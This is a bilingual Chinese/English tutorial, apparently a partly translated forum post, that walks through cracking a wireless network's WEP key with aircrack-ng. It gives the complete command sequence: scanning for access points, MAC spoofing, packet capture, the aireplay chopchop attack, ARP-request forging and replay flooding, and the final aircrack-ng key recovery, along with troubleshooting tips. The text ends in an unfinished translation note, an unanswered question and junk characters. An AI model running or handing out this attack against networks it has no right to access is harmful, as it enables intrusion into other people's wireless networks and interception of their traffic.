开始破解之前我们需要知道我周围都有一些什么无线热点,包括他们的 ESSID MAC 工作频道等等,在这之前我知道了我的无线网卡的地址为“ETH1” ,但是可能你的与我不同,你可以使用"IWCONFIG“命令查看你的无线网卡地址。(如果你下载了 AIRCRACK-NG工具,你需要初始化你的网络设置。) 运行一下命令查看你周围无线AP信息:
iwlist eth1 scan
Now we can get started. First we must enable rtap0 for listening. rtap0 is required (instead of just eth1) due to limitations in the ipw2200 driver.
现在我们可以开始了,第一步是要打开RTAP0虚拟监听端口和加载IPW2200的补丁程序。
rmmod ipw2200
modprobe ipw2200 rtap_iface=1
Next enable wireless and change MAC (changing MAC is optional).
下一步打开无线网卡并更改你的MAC地址(更改是为了以后方面输入)
ifconfig eth1 up hw ether 00:11:22:33:44:55
Configure wireless w/ essid, channel, and a fake key.
设置无线的ESSID,频道和一个虚拟链接
iwconfig eth1 essid <ESSID> channel <#> key s:fakekey mode managed
Now start collecting traffic on rtap0. "dump" is the name of the capture (.cap) file.
现在开始通过RTAP0虚拟端口抓取数据包
airodump-ng --bssid <AP MAC> -w dump rtap0
Now for the actual injection. Open a new terminal (<ctrl><alt><F2> if you are still in the console) and start the aireplay chopchop attack. Note the modifier "-i rtap0." This tells aireplay to use rtap0 for listening and eth1 for injecting. Also "-4" is the type of attack (chopchop).
现在我们要开始攻击了,打开一个新的SHELL 并且开始AIREPLAY攻击,记住要加一个-I RTAP0 这是告诉AIREPALY程序使用RTAP0虚拟端口监听数据,- 4 参数就是采用CHOPCHOP攻击。
aireplay-ng -4 -a <AP MAC> -h 00:11:22:33:44:55 -i rtap0 eth1
A prompt will ask you to use "this" packet. Type "y" and the attack should continue. Once it finishes you will have a plaintext (.cap) file and a keystream(.xor) file. The keystream file will look something like "replay_dec-######.xor"
当抓取到一个数据包的时候程序会问你“是否使用这个包?”输入Y后攻击开始。如果顺利完成你将获得一个.CAP的文件和一个.XOR的文件。在你的文件夹里你会看到多出想REPLAY_DEC-#####.XOR。
Make sure there are no errors reported after using aireplay. This is where I had the most difficulty. If the attack doesn't start after selecting the packet, you might not be close enough to the AP or the AP is not vulnerable to the chopchop attack. I also received an error stating the checksum didn't match. I just re-ran aireplay and it was fine.
过两天继续翻译 累得很。
Now we will create an arp-request packet using the aquired keysteam file. The "-l" and "-k" options are the source IP and destination IP. They can be any valid IP. The destination can be the gateway (router IP) but the attack run faster if it is an arbitrary IP.
packetforge-ng -0 -a <AP MAC> -h 00:11:22:33:44:55 -k 192.168.1.100 -l 192.168.1.101 -y replay_dec-####.xor -w arp-request
Finally we will send our newly created arp-request packet over and over. After this step you should see the "Data" begin to rise quickly back in the first terminal (airodump). If the data doesn't change (usually between 80 and 350 per second) then something is wrong.
aireplay-ng -2 -r arp-request eth1
Let aireplay run for a few minutes while you collect data. After 75,000 or so you can run aircrack in a third terminal (<ctrl><alt><F3>). Within a few minutes you should have the key.
aircrack-ng -z dump*.cap 提示RTAP0 工作在0频道,但是AP使用的是11频道。怎么弄呢? dddddddddd x kk
zhen de hen xiang kan